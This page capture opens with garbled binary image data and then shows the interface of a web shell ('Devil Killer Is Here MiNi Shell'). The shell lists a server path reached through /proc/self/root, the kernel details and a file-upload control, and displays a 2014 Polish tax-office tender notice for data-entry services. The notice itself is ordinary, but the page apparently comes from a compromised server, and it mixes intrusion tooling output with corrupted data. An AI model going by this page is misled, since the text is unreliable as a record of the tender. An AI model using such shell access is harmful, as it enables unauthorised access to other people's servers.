JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20141219/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20141219/415308-N-2014.html

<p class="kh_header"><b>Dąbrowa Górnicza: usługi wprowadzania danych i dodatkowe usługi biurowe  - ZKP   19/2014</b><br>
<b>Numer ogłoszenia: 415308 - 2014; data zamieszczenia: 19.12.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Skarbowy w Dąbrowie Górniczej , ul. Krasińskiego 33a, 41-300 Dąbrowa Górnicza, woj. śląskie, tel. 032 2959155, 2959099, 2959052.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.isnet.katowice.pl/us/dabrowa.htm</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> usługi wprowadzania danych i dodatkowe usługi biurowe  - ZKP   19/2014.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia podzielony został na 12 części (zadania). Opis przedmiotu zamówienia jest jednakowy dla każdej części (zadania) 
 Nr 1/2015, Nr 2/2015, Nr 3/2015, Nr 4/2015, Nr 5/2015, Nr 6/2015, 
Nr 7/2015, Nr 8/2015, Nr 9/2015, Nr 10/2015, Nr 11/2015, Nr 12/2015. 

część 1 - zamówienia dotyczy zadania Nr   1/2015 oszacowane na 1730 godzin
część 2 - zamówienia dotyczy zadania Nr   2/2015 oszacowane na 1730 godzin
część 3 - zamówienia dotyczy zadania Nr   3/2015 oszacowane na 1730 godzin
część 4 - zamówienia dotyczy zadania Nr   4/2015 oszacowane na 1730  godzin
część 5 - zamówienia dotyczy zadania Nr   5/2015 oszacowane na 1730  godzin
część 6  - zamówienia dotyczy zadania Nr  6/2015 oszacowane na   984 godziny
część 7  - zamówienia dotyczy zadania Nr  7/2015 oszacowane na  1776 godzin
część 8  - zamówienia dotyczy zadania Nr  8/2015 oszacowane na   984 godziny
część 9  - zamówienia dotyczy zadania Nr  9/2015 oszacowane na   984 godziny
część 10 - zamówienia dotyczy zadania Nr 10/2015 oszacowane na  1776 godzin
część 11 - zamówienia dotyczy zadania Nr  11/2015 oszacowane na 1776 godzin
część 12 - zamówienia dotyczy zadania Nr  12/2015 oszacowane na 1776 godzin

 1. Przedmiot zamówienia obejmuje świadczenie usług wprowadzania danych, usługi przetwarzania tekstu, usługi komputerowego maszynopisania oraz dodatkowe usługi biurowe.  
 2. Zamawiający dysponuje funduszami, które pozwalają na wynagrodzenie wykonawcy w wysokości nie większej niż 9,94 zł za jedną godzinę brutto.
 3. Zamawiający dopuszcza  składanie ofert częściowych obejmujących poszczególne zadania:

3.1. na wykonanie zadania przez poszczególne osoby fizyczne, nie prowadzące działalności gospodarczej według zasady: oferta jednego wykonawcy na wykonanie jednej części zamówienia  (zadania) (druki dla wykonawców nie prowadzących działalności gospodarczej). Wykonawca zobowiązany jest określić, na którą część (zadanie) składa ofertę.
3.2. Wykonawca  prowadzący działalność gospodarczą składając ofertę na wykonanie więcej niż jednego zadania powinien złożyć osobną ofertę na każdą część (zadanie) (druki dla wykonawców prowadzących działalność gospodarczą ).
Spośród złożonych ofert zamawiający wybierze zaoferowaną najniższą cenę na każdą z 12 części (zadań).

 4. Poszczególne części (zadania) oszacowana została na:  
część Nr 1  (zadanie Nr 1/2015) -   1730 godzin,
    	część Nr 2  (zadanie Nr 2/2015) -   1730 godzin,
    	część Nr 3  (zadanie Nr 3/2015) -   1730  godzin,
    	część Nr 4  (zadanie Nr 4/2015) -   1730  godzin,
    	część Nr 5  (zadanie Nr 5/2015) -   1730  godzin,
    	część Nr 6  (zadanie Nr 6/2015) -     984 godziny,
		część Nr 7  (zadanie Nr 7/2015) -   1776 godzin,
	 część Nr 8  (zadanie Nr 8/2015) -     984 godziny,
	 część Nr 9  (zadanie Nr 9/2015) -     984 godziny,
	 część Nr 10  (zadanie Nr 10/2015) -     1776 godzin,
	część Nr 11  (zadanie Nr 11/2015) -      1776 godzin,
	część Nr 12  (zadanie Nr 12/2015) -      1776 godzin.
   
 5. Zakres prac obejmuje:
1) Obsługa dokumentów wpływających do urzędu pod względem formalnym i rachunkowym;
2). Obsługa dokumentów w systemach informatycznych (Poltax, Egapoltax, Poltax - 2 B, CZM, Biblioteka Akt);
3) Inne czynności biurowe, np.:
3)1. kompletowanie dokumentacji;
3)2. tworzenie paczek z dokumentami oraz przekazywanie ich do właściwych     komórek urzędu;
3)3.przygotowywanie i wypisywanie wezwań;
3)4.wypisywanie potwierdzeń odbioru;
3)5.wykonywanie czynności ułatwiających kontakt urzędu z podatnikiem;
3)6.sprawdzanie wydruków komputerowych;
3)7. transport dokumentów.
      4). Praca na urządzeniach biurowych (np. kserokopiarka, fax, risograf, bindownica);
      5) Praca w aplikacji Microsoft Open Office. 
 6. Wyżej wymienione czynności muszą być wykonywane w siedzibie zamawiającego oraz         w godzinach 700 - 2000 w dniach pracy Urzędu, oraz w inne dni po odrębnym uzgodnieniu            a prace wprowadzania danych do systemu komputerowego wykonawca będzie wykonywał na sprzęcie będącym własnością zamawiającego..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>4. zamawiający  przewiduje możliwość udzielenia zamówień uzupełniających, stanowiących nie więcej niż 50% wartości zamówienia podstawowego dla poszczególnej części (zadania) stosownie do art. 36 ust.2 pkt.3) w związku z art. 67 ust. 1 pkt.6) p.z.p.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 79.55.10.00-1, 79.50.00.00-9, 79.55.20.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 12.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W prowadzonym postępowaniu zamawiający nie żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w tym postępowaniu wykonawca nie jest zobowiązany do posiadania uprawnień w trakcie wykonywania przedmiotowego zamówienia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż wykonawca spełnia powyższy warunek jeżeli złoży oświadczenie o spełnieniu tego warunku na formularzu ofertowym - Załącznik Nr 1 SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż wykonawca spełnia powyższy warunek jeżeli złoży oświadczenie o spełnieniu tego warunku na formularzu ofertowym - Załącznik Nr 1 SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w tym postępowaniu zamawiający wymaga aby osoby wykonujące usługi będące przedmiotem zamówienia  w dniu składania oferty  miały ukończone lat 18 oraz  legitymowały się ukończeniem minimum szkoły średniej.  Zamawiający uzna, iż wykonawca spełnia powyższy warunek jeżeli dostarczy w  ofercie dokument wymieniony  w punkcie 3 Rozdziału VI SIWZ: 
      3.1. punkt  3.1.1 -  wykonawcy będącego osobą fizyczną, nie prowadzącego działalności gospodarczej),
3.2.punkt  3.1.2 -  wykonawcy  prowadzącego działalność gospodarczą</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż wykonawca spełnia powyższy warunek jeżeli złoży oświadczenie o spełnieniu tego warunku na formularzu ofertowym - Załącznik Nr 1 SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - DOŚWIADCZENIE - 30</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.isnet.katowice.pl/us/dabrowa.htm<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ul. Krasińskiego 33A, 41-300 Dąbrowa Górnicza , Sala 100, stanowisko Nr 7.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.12.2014 godzina 12:00, miejsce: ul. Krasińskiego 33A, 41-300 Dąbrowa Górnicza , Sala 100, stanowisko Nr 7.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> zadanie Nr 1/2015.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres prac obejmuje:
1) Obsługa dokumentów wpływających do urzędu pod względem formalnym i rachunkowym;
2). Obsługa dokumentów w systemach informatycznych (Poltax, Egapoltax, Poltax - 2 B, CZM, Biblioteka Akt);
3) Inne czynności biurowe, np.:
3)1. kompletowanie dokumentacji;
3)2. tworzenie paczek z dokumentami oraz przekazywanie ich do właściwych     komórek urzędu;
3)3.przygotowywanie i wypisywanie wezwań;
3)4.wypisywanie potwierdzeń odbioru;
3)5.wykonywanie czynności ułatwiających kontakt urzędu z podatnikiem;
3)6.sprawdzanie wydruków komputerowych;
3)7. transport dokumentów.
      4). Praca na urządzeniach biurowych (np. kserokopiarka, fax, risograf, bindownica);
      5) Praca w aplikacji Microsoft Open Office. 
Zadanie oszacowano na 1730 godzin..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 79.55.10.00-1, 79.50.00.00-9, 79.22.20.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Doświadczenie - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie Nr 2/2015.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres prac obejmuje:
1) Obsługa dokumentów wpływających do urzędu pod względem formalnym i rachunkowym;
2). Obsługa dokumentów w systemach informatycznych (Poltax, Egapoltax, Poltax - 2 B, CZM, Biblioteka Akt);
3) Inne czynności biurowe, np.:
3)1. kompletowanie dokumentacji;
3)2. tworzenie paczek z dokumentami oraz przekazywanie ich do właściwych     komórek urzędu;
3)3.przygotowywanie i wypisywanie wezwań;
3)4.wypisywanie potwierdzeń odbioru;
3)5.wykonywanie czynności ułatwiających kontakt urzędu z podatnikiem;
3)6.sprawdzanie wydruków komputerowych;
3)7. transport dokumentów.
      4). Praca na urządzeniach biurowych (np. kserokopiarka, fax, risograf, bindownica);
      5) Praca w aplikacji Microsoft Open Office. 
Zadanie oszacowano na 1730 godzin..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 79.55.10.00-1, 79.50.00.00-9, 79.55.20.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Doświadczenie - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> zadanie Nr 3/2015.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres prac obejmuje:
1) Obsługa dokumentów wpływających do urzędu pod względem formalnym i rachunkowym;
2). Obsługa dokumentów w systemach informatycznych (Poltax, Egapoltax, Poltax - 2 B, CZM, Biblioteka Akt);
3) Inne czynności biurowe, np.:
3)1. kompletowanie dokumentacji;
3)2. tworzenie paczek z dokumentami oraz przekazywanie ich do właściwych     komórek urzędu;
3)3.przygotowywanie i wypisywanie wezwań;
3)4.wypisywanie potwierdzeń odbioru;
3)5.wykonywanie czynności ułatwiających kontakt urzędu z podatnikiem;
3)6.sprawdzanie wydruków komputerowych;
3)7. transport dokumentów.
      4). Praca na urządzeniach biurowych (np. kserokopiarka, fax, risograf, bindownica);
      5) Praca w aplikacji Microsoft Open Office. 
Zadanie oszacowano na 1730 godzin..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 79.55.10.00-1, 79.50.00.00-9, 79.55.20.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Doświadczenie - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie Nr 4/2015.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres prac obejmuje:
1) Obsługa dokumentów wpływających do urzędu pod względem formalnym i rachunkowym;
2). Obsługa dokumentów w systemach informatycznych (Poltax, Egapoltax, Poltax - 2 B, CZM, Biblioteka Akt);
3) Inne czynności biurowe, np.:
3)1. kompletowanie dokumentacji;
3)2. tworzenie paczek z dokumentami oraz przekazywanie ich do właściwych     komórek urzędu;
3)3.przygotowywanie i wypisywanie wezwań;
3)4.wypisywanie potwierdzeń odbioru;
3)5.wykonywanie czynności ułatwiających kontakt urzędu z podatnikiem;
3)6.sprawdzanie wydruków komputerowych;
3)7. transport dokumentów.
      4). Praca na urządzeniach biurowych (np. kserokopiarka, fax, risograf, bindownica);
      5) Praca w aplikacji Microsoft Open Office. 
Zadanie oszacowano na 1730 godzin..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 79.55.10.00-1, 79.50.00.00-9, 79.55.20.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Doświadczenie - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie Nr 5/2015.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres prac obejmuje:
1) Obsługa dokumentów wpływających do urzędu pod względem formalnym i rachunkowym;
2). Obsługa dokumentów w systemach informatycznych (Poltax, Egapoltax, Poltax - 2 B, CZM, Biblioteka Akt);
3) Inne czynności biurowe, np.:
3)1. kompletowanie dokumentacji;
3)2. tworzenie paczek z dokumentami oraz przekazywanie ich do właściwych     komórek urzędu;
3)3.przygotowywanie i wypisywanie wezwań;
3)4.wypisywanie potwierdzeń odbioru;
3)5.wykonywanie czynności ułatwiających kontakt urzędu z podatnikiem;
3)6.sprawdzanie wydruków komputerowych;
3)7. transport dokumentów.
      4). Praca na urządzeniach biurowych (np. kserokopiarka, fax, risograf, bindownica);
      5) Praca w aplikacji Microsoft Open Office. 
Zadanie oszacowano na 1730 godzin..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 79.55.10.00-1, 79.50.00.00-9, 79.55.20.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Doświadczenie - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie Nr 6/2015.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres prac obejmuje:
1) Obsługa dokumentów wpływających do urzędu pod względem formalnym i rachunkowym;
2). Obsługa dokumentów w systemach informatycznych (Poltax, Egapoltax, Poltax - 2 B, CZM, Biblioteka Akt);
3) Inne czynności biurowe, np.:
3)1. kompletowanie dokumentacji;
3)2. tworzenie paczek z dokumentami oraz przekazywanie ich do właściwych     komórek urzędu;
3)3.przygotowywanie i wypisywanie wezwań;
3)4.wypisywanie potwierdzeń odbioru;
3)5.wykonywanie czynności ułatwiających kontakt urzędu z podatnikiem;
3)6.sprawdzanie wydruków komputerowych;
3)7. transport dokumentów.
      4). Praca na urządzeniach biurowych (np. kserokopiarka, fax, risograf, bindownica);
      5) Praca w aplikacji Microsoft Open Office. 
Zadanie oszacowano na 984 godzin..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 79.55.10.00-1, 79.50.00.00-9, 79.55.20.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Doświadczenie - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zadanie Nr 7/2015.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres prac obejmuje:
1) Obsługa dokumentów wpływających do urzędu pod względem formalnym i rachunkowym;
2). Obsługa dokumentów w systemach informatycznych (Poltax, Egapoltax, Poltax - 2 B, CZM, Biblioteka Akt);
3) Inne czynności biurowe, np.:
3)1. kompletowanie dokumentacji;
3)2. tworzenie paczek z dokumentami oraz przekazywanie ich do właściwych     komórek urzędu;
3)3.przygotowywanie i wypisywanie wezwań;
3)4.wypisywanie potwierdzeń odbioru;
3)5.wykonywanie czynności ułatwiających kontakt urzędu z podatnikiem;
3)6.sprawdzanie wydruków komputerowych;
3)7. transport dokumentów.
      4). Praca na urządzeniach biurowych (np. kserokopiarka, fax, risograf, bindownica);
      5) Praca w aplikacji Microsoft Open Office. 
Zadanie oszacowano na 1776 godzin..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 79.55.10.00-1, 79.50.00.00-9, 79.55.20.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
